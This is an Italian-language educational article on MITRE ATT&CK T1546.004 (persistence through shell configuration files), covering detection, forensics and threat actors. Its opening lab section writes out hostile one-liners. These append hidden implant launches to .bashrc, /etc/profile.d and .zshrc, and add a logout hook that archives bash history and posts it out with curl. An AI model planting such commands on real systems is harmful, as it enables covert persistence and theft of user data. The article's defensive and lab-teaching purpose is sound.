Persistenza nella Shell Unix: Unix Shell Configuration Modification (T1546.004)

La simulazione di questa tecnica in laboratorio è estremamente diretta e non richiede tool complessi. L'obiettivo è dimostrare come una singola riga in un file di configurazione shell possa garantire persistenza stabile, sia a livello utente che a livello sistema.

Persistenza user-level su Linux (bash). Il vettore più comune è ~/.bashrc, che viene eseguito ad ogni apertura di shell interattiva o connessione remota. In laboratorio, simula l'inserimento di un beacon con un comando come:

echo 'nohup /tmp/implant &>/dev/null &' >> ~/.bashrc

Per replicare il comportamento di RotaJakiro, che nasconde il binario in una directory con prefisso dot, crea prima la struttura:

mkdir -p ${HOME}/.gvfsd/.profile/ && cp implant ${HOME}/.gvfsd/.profile/payload && echo '${HOME}/.gvfsd/.profile/payload &' >> ~/.bashrc

L'ordine di sourcing è rilevante: bash esegue solo il primo file esistente tra ~/.bash_profile, ~/.bash_login e ~/.profile. In un esercizio red team, verificare quale esiste con ls -la ~/.bash_profile ~/.bash_login ~/.profile 2>/dev/null consente di scegliere il punto di inserzione ottimale.

Persistenza system-level. Se si dispone di privilegi root, il target diventa /etc/profile.d/. Creare uno script in questa directory è meno invasivo rispetto alla modifica diretta di /etc/profile e passa più facilmente inosservato:

echo '#!/bin/bash' > /etc/profile.d/sysupdate.sh && echo '/opt/.cache/updater &' >> /etc/profile.d/sysupdate.sh && chmod 644 /etc/profile.d/sysupdate.sh

Persistenza su macOS (zsh). Il comportamento di XCSSET è particolarmente elegante: anziché modificare direttamente .zshrc, crea un file separato .zshrc_aliases e inserisce in .zshrc solo una riga di sourcing. In laboratorio:

echo '/tmp/payload' > ~/.zshrc_aliases && echo '[ -f $HOME/.zshrc_aliases ] && . $HOME/.zshrc_aliases' >> ~/.zshrc

Questo approccio riduce la visibilità dell'iniezione perché il contenuto malevolo risiede in un file dall'aspetto innocuo.

Persistenza al logout. Un vettore spesso trascurato è ~/.bash_logout, eseguito alla chiusura della sessione. Utile per esfiltrare dati raccolti durante la sessione o per ripulire tracce:

echo 'tar czf /tmp/.sess.tgz ~/.bash_history && curl -X POST -F "f=@/tmp/.sess.tgz" ' >> ~/.bash_logout

Per validare la catena completa, lo strumento Atomic Red Team (open source) di Red Canary include test specifici per T1546.004 che automatizzano l'inserzione e la verifica di payload nei file di configurazione shell, consentendo di misurare la detection posture del SOC in modo strutturato.

La detection di questa tecnica si fonda su un principio semplice: i file di configurazione shell vengono modificati raramente in condizioni normali. Qualsiasi scrittura su questi file, specialmente se seguita da esecuzione di processi anomali o connessioni di rete, merita attenzione immediata.

Log source primari su Linux. Il componente fondamentale è auditd (open source), configurato per monitorare le scritture sui file critici. Le regole audit da implementare coprono sia il livello sistema che utente:

-w /etc/profile -p wa -k shell_config_mod -w /etc/profile.d/ -p wa -k shell_config_mod -w /etc/bashrc -p wa -k shell_config_mod

Per i file utente, dato che il path varia per ciascun home directory, una regola generica con auditd è meno pratica. Qui entra in gioco il File Integrity Monitoring (FIM): soluzioni come Wazuh (open source) o OSSEC (open source) monitorano le modifiche ricorsivamente nelle home directory, generando alert quando .bashrc, .bash_profile o .profile vengono alterati.

L'analytic AN0059 descrive una correlazione cruciale: la modifica del file di configurazione (evento SYSCALL con write su path monitorato) seguita, entro una finestra temporale configurabile, da un'esecuzione anomala (EXECVE) o da un flusso di rete (NSM:Flow) originato dalla shell appena lanciata. Il parametro di tuning TimeWindow è determinante: finestre troppo strette producono falsi negativi, troppo ampie generano rumore. Un buon punto di partenza è 60 secondi dal login.

Log source su macOS. L'analytic AN0060 sfrutta i log unificati macOS (macos:unifiedlog) e il framework Endpoint Security (macos:endpointsecurity) per correlare la modifica di file zsh — come ~/.zshrc, ~/.zlogin e /etc/zprofile — con l'esecuzione di binari non firmati o connessioni a IP esterni al lancio di Terminal.app. Il parametro PayloadEntropyThreshold è particolarmente utile: comandi offuscati o codificati in base64 inseriti nei file di configurazione presentano un'entropia significativamente più alta rispetto ad alias e variabili d'ambiente legittime.

Gestione dei falsi positivi. Il principale generatore di noise sono i tool di gestione configurazione come Ansible, Puppet e Chef, che modificano legittimamente i file di profilo durante il provisioning. La mitigazione passa per il tuning del parametro TargetUser: escludere gli account di servizio usati dall'orchestrazione e concentrare la detection sugli account interattivi. Un approccio complementare è creare una whitelist basata sul processo scrivente: se il parent process è ansible-playbook o puppet agent, l'alert viene soppresso; se è bash, curl o wget, la priorità sale.

Per il livello preventivo, la mitigazione M1022 prescrive di rendere i file di configurazione sistema immutabili tramite chattr +i /etc/profile su Linux, limitando la modifica ai soli amministratori che rimuovano esplicitamente il flag.

L'analisi forense di questa tecnica parte da un vantaggio significativo: i file di configurazione shell sono file di testo residenti su filesystem, il che li rende facilmente acquisibili, confrontabili e correlabili temporalmente. La sfida è distinguere le modifiche legittime da quelle malevole in sistemi con una lunga storia operativa.

Acquisizione e baseline. Il primo passo è estrarre tutti i file di configurazione shell dal sistema compromesso, sia a livello sistema che utente. Su Linux, la raccolta copre /etc/profile, /etc/profile.d/*, /etc/bashrc, e per ogni utente in /home/ i file .bashrc, .bash_profile, .bash_login, .profile e .bash_logout. Su macOS si aggiungono /etc/zshenv, /etc/zprofile, /etc/zlogin, /etc/zlogout e i corrispettivi utente .zshrc, .zshenv, .zprofile, .zlogin, .zlogout. Se esiste un sistema di configuration management, il confronto con la baseline nota è immediato e risolutivo.

Analisi dei metadati filesystem. I timestamp mtime e ctime di ciascun file sono il primo indicatore. Attenzione: un avversario sofisticato può alterare il mtime con touch -t, ma il ctime (change time) su filesystem ext4 non è modificabile dall'utente. Un file .bashrc il cui ctime è significativamente più recente del mtime è un segnale forte di manipolazione. Il comando stat applicato a ciascun file restituisce entrambi i valori.

Correlazione con log auditd. Se il sistema aveva auditd attivo con le regole appropriate, i record SYSCALL con openat o write sui file di configurazione contengono il PID e l'UID del processo scrivente, il timestamp preciso e il percorso completo. Questi record ancorano la timeline dell'inserzione del payload. La correlazione con i record EXECVE successivi rivela cosa viene eseguito alla prima shell post-modifica.

Nei casi documentati, RotaJakiro lascia una traccia caratteristica: la directory nascosta ${HOME}/.gvfsd/.profile/ contenente il binario. Green Lambert modifica file associati a multiple shell — bash, csh, tcsh — il che produce un pattern insolito di scritture quasi simultanee su profile, login e file rc di shell diverse. Linux Rabbit utilizza sia rc.local sia .bashrc, combinando persistenza al boot con persistenza alla shell: la presenza di entrambe le modifiche è un indicatore ad alta confidenza.

Artefatti macOS specifici. Per XCSSET, l'artefatto chiave è il file ~/.zshrc_aliases — un nome che imita i file di alias legittimi ma che normalmente non esiste in un'installazione standard. La riga di sourcing condizionale in .zshrc è progettata per non generare errori se il file viene rimosso, rendendo la persistenza resiliente ma anche individuabile attraverso il database FSEvents di macOS, che registra le operazioni su file anche dopo la cancellazione.

Per la ricostruzione della timeline complessiva, Plaso/log2timeline (open source) consente di ingerire simultaneamente i metadati filesystem, i log auditd e gli FSEvents macOS, producendo una super-timeline ordinata cronologicamente che evidenzia la sequenza modifica-file → login → esecuzione-payload.

L'ecosistema degli attori che sfruttano la modifica dei file di configurazione shell rivela un pattern chiaro: questa tecnica è prediletta da operazioni che puntano su sistemi Linux e macOS dove la persistenza tradizionale (systemd unit, cron job) potrebbe essere monitorata più attentamente.

Contagious Interview (G1052) è un gruppo che prende di mira sistemi macOS con un approccio a due stadi. L'infezione passa attraverso uno script bash downloader denominato coremedia.sh e un secondo script cloud.sh, nomi scelti per mimetizzarsi tra processi legittimi del sistema operativo Apple. Il targeting di macOS suggerisce un focus su ambienti di sviluppo e professionisti del settore tech, coerente con campagne di social engineering legate a finti colloqui di lavoro. L'uso di bash su macOS — anziché zsh, la shell predefinita da macOS 10.15 — indica che gli script potrebbero puntare a sistemi non ancora aggiornati o a contesti dove bash è mantenuto per compatibilità.

La campagna ShadowRay (C0045), attiva tra settembre 2023 e marzo 2024, rappresenta un caso particolarmente significativo. Ha sfruttato la vulnerabilità CVE-2023-48022 nel framework AI Ray per ottenere accesso a risorse computazionali esposte, colpendo settori come educazione, criptovalute e biopharma. Gli attaccanti hanno eseguito comandi su shell interattive e reverse shell, rendendo i file di configurazione un vettore naturale per mantenere la persistenza sulle istanze compromesse. La controversia con il vendor — che considera Ray non destinato a reti non controllate — evidenzia un gap ricorrente: framework AI distribuiti senza hardening di default diventano superfici d'attacco massicce.

Sul fronte del malware, emergono due pattern operativi distinti. Il primo è la persistenza multi-shell: Green Lambert modifica i file di configurazione di bash, csh e tcsh simultaneamente, una scelta che massimizza la probabilità di esecuzione indipendentemente dalla shell predefinita dell'utente. Questo approccio è tipico di operazioni mature che non fanno assunzioni sull'ambiente target. Il secondo è la persistenza indiretta: XCSSET non inietta il payload direttamente in .zshrc ma crea un file satellite (.zshrc_aliases) e usa solo una riga di sourcing, una tecnica di evasione che riduce la visibilità durante un'ispezione manuale rapida del file di profilo.

RotaJakiro aggiunge un ulteriore livello di sofisticazione adattando il proprio meccanismo di persistenza ai privilegi disponibili: senza root, utilizza .bashrc con un binario nascosto in una directory dot. Linux Rabbit invece adotta un approccio ridondante, combinando .bashrc con rc.local per coprire sia il boot del sistema che l'apertura di sessioni interattive.

Il trend emergente da questi dati punta verso una convergenza tra exploitation di infrastrutture AI/ML e persistenza tramite configurazioni shell su sistemi Linux server-class, dove le workstation di data science spesso operano con configurazioni permissive e monitoraggio endpoint limitato.

Framework MITRE ATT&CK v16 — Tecnica T1546.004, Tattica TA0003, TA0004. Campagna C0045 (ShadowRay). Detection: analytic AN0059 (Linux), AN0060 (macOS). Mitigazione M1022. Tool di detection: auditd, Wazuh, OSSEC, Plaso/log2timeline. Integrato con conoscenza professionale per tool e procedure operative.